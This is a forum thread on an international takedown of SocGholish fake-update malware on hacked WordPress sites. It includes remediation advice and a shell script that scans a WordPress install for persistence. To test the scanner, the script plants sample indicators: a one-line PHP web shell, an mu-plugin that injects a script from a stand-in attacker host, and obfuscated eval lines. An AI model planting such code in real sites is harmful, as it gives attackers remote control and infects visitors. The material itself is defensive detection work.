Malware News: International law enforcement initiates hunt for malware group SocGholish

nicolaasjan (Thread author)

May 29, 2023
As part of Operation Endgame, a major operation this week disrupted a key infection chain used by cybercriminals. In an international cooperation, 14,971 websites infected with SocGholish malware were remediated. This malware is used by a criminal group that plays a pivotal role in international cybercrime, namely Evil Corp.

SocGholish exploits hacked legitimate WordPress sites to spread malware to visitors, with the aim of gaining unauthorized access to their computer systems. WordPress is the world’s most widely used platform for building websites. According to WordPress, more than 43% of all websites on the internet are powered by WordPress. The login credentials of 1.4 million websites have been leaked. That means these sites are vulnerable to malware infection. About 14,971 sites that provide everyday services have been infected with this malware. This includes websites of restaurants or car garages.

Maikel Rollman, National High Tech Crime Unit: 'With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware. It also reduces the risk that these systems are used for cyber attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.'

14,971 websites remediated and the SocGholish botnet disrupted

In the past few days, the Netherlands (NHCTU), Canada (RCMP), the United States (FBI) and Germany (BKA), with support from Europol and Eurojust, delivered a major blow to SocGholish’s criminal infrastructure during a joint action week.

Worldwide, 106 servers and domains were taken down, and 14,971 websites have been remediated. In addition, the following actions were carried out:
  • Cleaning infected WordPress sites and victim notification, urging previously infected WordPress owners to update their sites and change their login credentials.
  • Disabling the SocGholish botnet by taking over domain names and taking servers offline.
  • Victim notification for owners of WordPress sites whose leaked login credentials were identified by the police, via HaveIBeenPwned, DIVD, Spamhaus, CheckjeHack, NoMoreLeaks, The Shadowserver Foundation and NCSC (Netherlands).
 
This is a good reminder that “legitimate site” does not automatically mean “safe,” especially when common CMS platforms like WordPress get compromised and used as a malware delivery channel.

What SocGholish typically means in practice
SocGholish (often referred to as “FakeUpdates”) is commonly used as an initial access vector: a compromised website shows a convincing browser/update prompt and tries to trick visitors into running a downloader/installer. From there, attackers may pivot to additional malware and follow-on activity. That’s why disrupting its infrastructure and cleaning compromised sites can have an outsized impact.

If you own or manage a WordPress site
The most important takeaway isn’t only “update WordPress” but to assume that compromised credentials and persistence mechanisms may exist if a site was exposed or compromised.

  • Change all WordPress/admin/hosting/FTP/SSH/database passwords (use unique, long passwords) and enable MFA wherever possible.
  • Update WordPress core, themes, and plugins; remove anything unused or unmaintained.
  • Audit admin users (remove unknown accounts), API keys, and any new/modified plugins/themes.
  • Check for persistence: scheduled tasks/cron jobs, modified wp-config.php, suspicious mu-plugins, new PHP files in uploads, and unexpected .htaccess rules.
  • Review access logs for unusual admin logins and file changes; restore from a known-good backup if integrity is in doubt.
  • Add hardening: least-privilege accounts, WAF/CDN rules, file integrity monitoring, and regular offsite backups.

If leaked credentials are part of the issue (as mentioned in the quoted text), treat that as a full credential compromise: rotating passwords without MFA and log review often isn’t enough.

If you’re a normal visitor/user
  • Do not run “update” files offered by random websites. Browser/OS updates should come from the browser’s built-in updater or the official vendor site.
  • If you suspect you downloaded or ran something from such a prompt, disconnect from the network and run full scans with reputable security software, then change passwords from a known-clean device.
  • Consider checking email/password exposure via services like Have I Been Pwned (it’s for account exposure, not device infection, but it helps with credential hygiene).

Next step
Site owners should prioritize credential rotation + MFA and a compromise-focused integrity review (not just patching), because that’s what most reduces the chance of reinfection after a takedown/remediation wave.
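The site-owner checklist above, turned into a runnable triage, as an added example that is not part of the original post and not code from WordPress or WP-CLI: a POSIX sh script that walks a WordPress document root for the persistence spots the reply lists (PHP in uploads, mu-plugins, wp-config.php, .htaccess, externally hosted script tags, recently changed PHP). Every grep pattern is a heuristic chosen for illustration, not a SocGholish indicator; the sample site it builds, the planted files and the hostname cdn.example-attacker.invalid are constructed for the demo. Account and scheduled-task checks need database access and are left to WP-CLI.

```shell
#!/bin/sh
# Added example (not from the original post, WordPress or WP-CLI): offline triage of a
# WordPress document root for the persistence spots listed in the reply. Every pattern
# below is an assumed heuristic for illustration, not a SocGholish indicator.

# Print one tagged finding per line so the output can be piped into further tooling.
wp_triage() {
    root="$1"

    # 1. Executable PHP under uploads: WordPress itself never writes .php files there.
    find "$root/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null |
        while read -r f; do echo "UPLOAD_PHP $f"; done

    # 2. Must-use plugins load on every request and cannot be deactivated from the
    #    admin UI, so list every file there for manual review.
    for f in "$root"/wp-content/mu-plugins/*; do
        if [ -e "$f" ]; then echo "MU_PLUGIN $f"; fi
    done

    # 3. Obfuscation primitives in wp-config.php (a clean config has no reason for them).
    grep -nE 'eval\(|base64_decode\(|gzinflate\(|str_rot13\(' "$root/wp-config.php" 2>/dev/null |
        while read -r line; do echo "WPCONFIG $line"; done

    # 4. .htaccess directives that prepend code, make other extensions executable as PHP
    #    or redirect off-site. The stock rule "RewriteRule . /index.php [L]" does not match.
    find "$root" -name .htaccess -type f 2>/dev/null | while read -r f; do
        grep -nE 'auto_prepend_file|AddHandler|AddType[^#]*php|RewriteRule[^#]*https?://' "$f" |
            while read -r line; do echo "HTACCESS $f:$line"; done
    done

    # 5. Externally hosted <script src=...> in theme or mu-plugin code; prints the host.
    grep -rnoE "<script[^>]*src=[\"']https?://[^/\"']+" \
        "$root/wp-content/themes" "$root/wp-content/mu-plugins" 2>/dev/null |
        while read -r line; do echo "EXT_SCRIPT $line"; done

    # 6. PHP changed in the last 7 days outside core. Core files are better compared
    #    against upstream hashes with 'wp core verify-checksums'.
    find "$root" -type f -name '*.php' -mtime -7 \
        ! -path "$root/wp-admin/*" ! -path "$root/wp-includes/*" 2>/dev/null |
        while read -r f; do echo "RECENT_PHP $f"; done
}

# Number of findings, for scripting (0 means nothing matched the heuristics above).
wp_triage_count() {
    wp_triage "$1" | wc -l | tr -d ' '
}

# Constructed sample site: a few legitimate files backdated to 2023, then four planted
# indicators of the kind the checklist describes. The hostname uses the reserved .invalid TLD.
make_sample_site() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-admin" "$d/wp-includes" "$d/wp-content/uploads/2024/05" \
             "$d/wp-content/mu-plugins" "$d/wp-content/themes/demo"
    echo '<?php require __DIR__ . "/wp-blog-header.php";' > "$d/index.php"
    printf '<?php\ndefine("DB_NAME", "wp");\n' > "$d/wp-config.php"
    printf 'RewriteEngine On\nRewriteRule . /index.php [L]\n' > "$d/.htaccess"
    echo '<?php /* theme functions, untouched */' > "$d/wp-content/themes/demo/functions.php"
    touch -t 202301010000 "$d/index.php" "$d/wp-content/themes/demo/functions.php"
    # planted: web shell stub in uploads, mu-plugin injecting a remote script,
    # obfuscated line appended to wp-config.php, auto_prepend_file in .htaccess
    echo '<?php eval($_POST["c"]); // planted stub' > "$d/wp-content/uploads/2024/05/cache.php"
    cat > "$d/wp-content/mu-plugins/cache-helper.php" <<'EOF'
<?php
add_action('wp_head', function () {
    echo '<script src="https://cdn.example-attacker.invalid/u.js"></script>';
});
EOF
    echo 'eval(base64_decode("ZWNobyAxOw=="));' >> "$d/wp-config.php"
    echo 'php_value auto_prepend_file "/tmp/.p.php"' >> "$d/.htaccess"
    echo "$d"
}

# Demo run against the constructed site: prints the tagged findings, then "findings: 8".
site=$(make_sample_site)
wp_triage "$site"
echo "findings: $(wp_triage_count "$site")"
rm -rf "$site"
```

Run it as `wp_triage /var/www/html` on a real install and review every line by hand; the tags are triage hints, not verdicts. Pair it with WP-CLI for the checks that need the database: `wp core verify-checksums` and `wp plugin verify-checksums --all` for file integrity against upstream, `wp user list --role=administrator` for the admin audit, and `wp cron event list` for scheduled tasks.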